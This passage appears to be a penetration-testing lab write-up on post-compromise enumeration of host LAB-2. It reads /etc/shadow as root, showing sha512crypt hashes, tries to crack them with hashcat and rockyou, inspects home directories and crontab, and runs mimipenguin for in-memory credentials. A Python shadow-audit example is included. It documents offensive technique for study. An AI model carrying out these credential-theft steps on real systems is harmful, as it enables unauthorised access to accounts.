Post Compromise Enumeration
Checking the system as the root account after compromising it
/etc/shadow
root@LAB-2:/# cat /etc/shadow
root:$6$n5REEVlM$nYgdHK6CtQp3vbyZw2.lMaeUANVM75JmlRncD6qnObUetFP8SG2cc8XW/1enA1oUxXS39H17Cz8./En8sNQNe.:19979:0:99999:7:::
daemon:*:19979:0:99999:7:::
bin:*:19979:0:99999:7:::
sys:*:19979:0:99999:7:::
sync:*:19979:0:99999:7:::
games:*:19979:0:99999:7:::
man:*:19979:0:99999:7:::
lp:*:19979:0:99999:7:::
mail:*:19979:0:99999:7:::
news:*:19979:0:99999:7:::
uucp:*:19979:0:99999:7:::
proxy:*:19979:0:99999:7:::
www-data:*:19979:0:99999:7:::
backup:*:19979:0:99999:7:::
list:*:19979:0:99999:7:::
irc:*:19979:0:99999:7:::
gnats:*:19979:0:99999:7:::
nobody:*:19979:0:99999:7:::
systemd-network:*:19979:0:99999:7:::
systemd-resolve:*:19979:0:99999:7:::
syslog:*:19979:0:99999:7:::
messagebus:*:19979:0:99999:7:::
_apt:*:19979:0:99999:7:::
uuidd:*:19979:0:99999:7:::
sshd:*:19979:0:99999:7:::
wao:$6$ZENNwHYt$DhiPYWPPBP/2sxfUusrx/5x6.8b5qI4gdJde9NDbV.8kTtxTdxvEW5rb5wG9qudc82aX01AOILA2iNoZYEilE/:19982:0:99999:7:::
steven:$6$W14mH6Yy$.qJ3F3FwQ5oVgBiYdCLBSQn8v.SbJ3MDEoTZ/0OhpamOhUKH/hgTZOyuoxcZpwiGtqLYy5PTz1zL6GY7vWGF8/:19979:0:99999:7:::
emma:$6$2gWMCP4b$pzjWdquZSg80UdO2RylTycDchjgdlznxGHhGdKafgyaUgjVVLwsgjbirtNkIzvDCBk5ixquxiba0IFwX6bsa9.:19980:0:99999:7:::
Grabbing the credential hashes in the /etc/shadow file
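An added example (not part of the original write-up) that audits /etc/shadow in the layout shown above: it separates locked service accounts (`*` or `!`) from accounts that actually hold a crackable hash or no password at all, identifies the crypt(3) scheme from the `$id$` prefix, and turns the third field (days since 1970-01-01) into a calendar date. The sample entries are constructed with placeholder hash strings.

```python
# Added example (not part of the original write-up): audit /etc/shadow entries to see
# which accounts can actually authenticate with a password, which hash scheme protects
# them, and when the password was last changed. Sample entries below are constructed.
from datetime import date, timedelta
from typing import NamedTuple, Optional

# crypt(3) prefix -> scheme name; "$6$" is sha512crypt, hashcat mode 1800 on this page
SCHEMES = {"$6$": "sha512crypt", "$5$": "sha256crypt", "$1$": "md5crypt",
           "$y$": "yescrypt", "$2b$": "bcrypt", "$2y$": "bcrypt"}

class ShadowEntry(NamedTuple):
    user: str
    status: str                  # "locked", "empty-password" or "hashed"
    scheme: str                  # hash scheme, "" when not hashed
    last_change: Optional[date]  # field 3: days since 1970-01-01

def classify(hash_field: str) -> tuple:
    """Map the second shadow field to (status, scheme)."""
    if hash_field == "":
        return "empty-password", ""     # no password required at all
    if hash_field[0] in "*!":
        return "locked", ""             # '*' / '!' prefix: password login disabled
    for prefix, name in SCHEMES.items():
        if hash_field.startswith(prefix):
            return "hashed", name
    return "hashed", "unknown"

def parse_shadow(text: str) -> list:
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, hash_field, last_change = line.split(":")[:3]
        status, scheme = classify(hash_field)
        changed = date(1970, 1, 1) + timedelta(days=int(last_change)) if last_change else None
        entries.append(ShadowEntry(user, status, scheme, changed))
    return entries

def exposed_accounts(text: str) -> list:
    """Accounts whose entries matter if /etc/shadow leaks: anything not locked."""
    return [e.user for e in parse_shadow(text) if e.status != "locked"]

# Constructed sample in the page's layout; the hash strings are placeholders.
SAMPLE = """root:$6$saltsalt$PLACEHOLDERHASH:19979:0:99999:7:::
daemon:*:19979:0:99999:7:::
sshd:*:19979:0:99999:7:::
wao:$6$saltsalt$PLACEHOLDERHASH:19982:0:99999:7:::
guest::19980:0:99999:7:::
"""
```

Day 19979 resolves to 2024-09-13, which matches the `Sep 13` timestamps on the dotfiles in the home listings further down.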
Password Cracking (Failed)
PS C:\Users\tacticalgator\Tools\hashcat-6.2.6> .\hashcat.exe -a 0 -m 1800 .\hashes.txt .\rockyou.txt
hashcat (v6.2.6) starting
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 4 digests; 4 unique digests, 4 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Uses-64-Bit
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: .\hashes.txt
Time.Started.....: Tue Oct 29 11:23:01 2024 (15 mins, 33 secs)
Time.Estimated...: Tue Oct 29 11:38:34 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 60348 H/s (0.91ms) @ Accel:2048 Loops:32 Thr:32 Vec:1
Speed.#3.........: 1205 H/s (1.08ms) @ Accel:512 Loops:8 Thr:16 Vec:1
Speed.#*.........: 61553 H/s
Recovered........: 0/4 (0.00%) Digests (total), 0/4 (0.00%) Digests (new), 0/4 (0.00%) Salts
Progress.........: 57377540/57377540 (100.00%)
Rejected.........: 0/57377540 (0.00%)
Restore.Point....: 14342516/14344385 (99.99%)
Restore.Sub.#1...: Salt:3 Amplifier:0-1 Iteration:4992-5000
Restore.Sub.#3...: Salt:3 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121313233617364] -> $HEX[042a0337c2a156616d6f732103]
Candidates.#3....: !7/24/08! -> !18593"
Hardware.Mon.#1..: Temp: 59c Util: 0% Core: 780MHz Mem:6000MHz Bus:8
Hardware.Mon.#3..: N/A
Started: Tue Oct 29 11:22:18 2024
Stopped: Tue Oct 29 11:38:35 2024
hashcat was unable to crack the password hashes
Home
root@LAB-2:/home# ll *
emma:
total 28
drwxr-xr-x 4 emma emma 4096 Sep 14 03:46 ./
drwxr-xr-x 5 root root 4096 Sep 14 03:45 ../
lrwxrwxrwx 1 root root 9 Sep 14 03:46 .bash_history -> /dev/null
-rw-r--r-- 1 emma emma 220 Sep 14 03:44 .bash_logout
-rw-r--r-- 1 emma emma 3771 Sep 14 03:44 .bashrc
drwx------ 2 emma emma 4096 Sep 14 03:45 .cache/
drwx------ 3 emma emma 4096 Sep 14 03:45 .gnupg/
-rw-r--r-- 1 emma emma 807 Sep 14 03:44 .profile
-rw-r--r-- 1 emma emma 0 Sep 14 03:45 .sudo_as_admin_successful
steven:
total 20
drwxr-xr-x 2 steven steven 4096 Sep 14 03:47 ./
drwxr-xr-x 5 root root 4096 Sep 14 03:45 ../
lrwxrwxrwx 1 root root 9 Sep 14 03:47 .bash_history -> /dev/null
-rw-r--r-- 1 steven steven 220 Sep 13 11:09 .bash_logout
-rw-r--r-- 1 steven steven 3771 Sep 13 11:09 .bashrc
-rw-r--r-- 1 steven steven 807 Sep 13 11:09 .profile
wao:
total 52
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ./
drwxr-xr-x 5 root root 4096 Sep 14 03:45 ../
lrwxrwxrwx 1 root root 9 Sep 14 03:48 .bash_history -> /dev/null
-rw-r--r-- 1 wao wao 220 Sep 13 11:08 .bash_logout
-rw-r--r-- 1 wao wao 3771 Sep 13 11:08 .bashrc
drwx------ 2 wao wao 4096 Sep 14 03:55 .cache/
drwx------ 3 wao wao 4096 Sep 14 07:21 .config/
drwxrwxr-x 2 wao wao 4096 Sep 14 06:41 Desktop/
drwxrwxr-x 2 wao wao 4096 Sep 14 06:42 Documents/
drwxrwxr-x 9 wao wao 4096 Sep 14 03:55 Downloads/
drwx------ 3 wao wao 4096 Sep 14 03:55 .gnupg/
drwxrwxr-x 3 wao wao 4096 Sep 14 07:32 .local/
-rw-r--r-- 1 wao wao 807 Sep 13 11:08 .profile
-rw-r--r-- 1 root root 66 Oct 21 17:09 .selected_editor
-rw-r--r-- 1 wao wao 0 Sep 14 03:58 .sudo_as_admin_successful
The wao user’s home directory appears to be the most interesting
wao
root@LAB-2:/home/wao# ll *
Desktop:
total 8
drwxrwxr-x 2 wao wao 4096 Sep 14 06:41 ./
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ../
Documents:
total 8
drwxrwxr-x 2 wao wao 4096 Sep 14 06:42 ./
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ../
Downloads:
total 60
drwxrwxr-x 9 wao wao 4096 Sep 14 03:55 ./
drwxr-xr-x 9 wao wao 4096 Oct 21 17:09 ../
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 CA/
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 gunicorn-test/
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 nginx/
-rwxrwxr-x 1 wao wao 22616 Sep 14 03:55 proto-features.py*
drwxrwxr-x 2 wao wao 4096 Sep 14 03:55 test/
drwxrwxr-x 3 wao wao 4096 Sep 14 03:55 University-Linux/
drwxrwxr-x 5 wao wao 4096 Sep 14 03:55 University-Prototype-23/
drwxrwxr-x 3 wao wao 4096 Sep 14 03:55 University-Windows/
The Downloads directory contains files and directories relevant to the target web application. Upon closer examination, nothing notable was found.
Cron
root@LAB-2:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
0 * * * * /usr/bin/pkill -u $(who | awk '{print $1}' | sort | uniq)
N/A
Memory Dump
root@LAB-2:/var/tmp# ./mimipenguin
[+] Searching: [SYSTEM - SSH] (sshd:)
N/A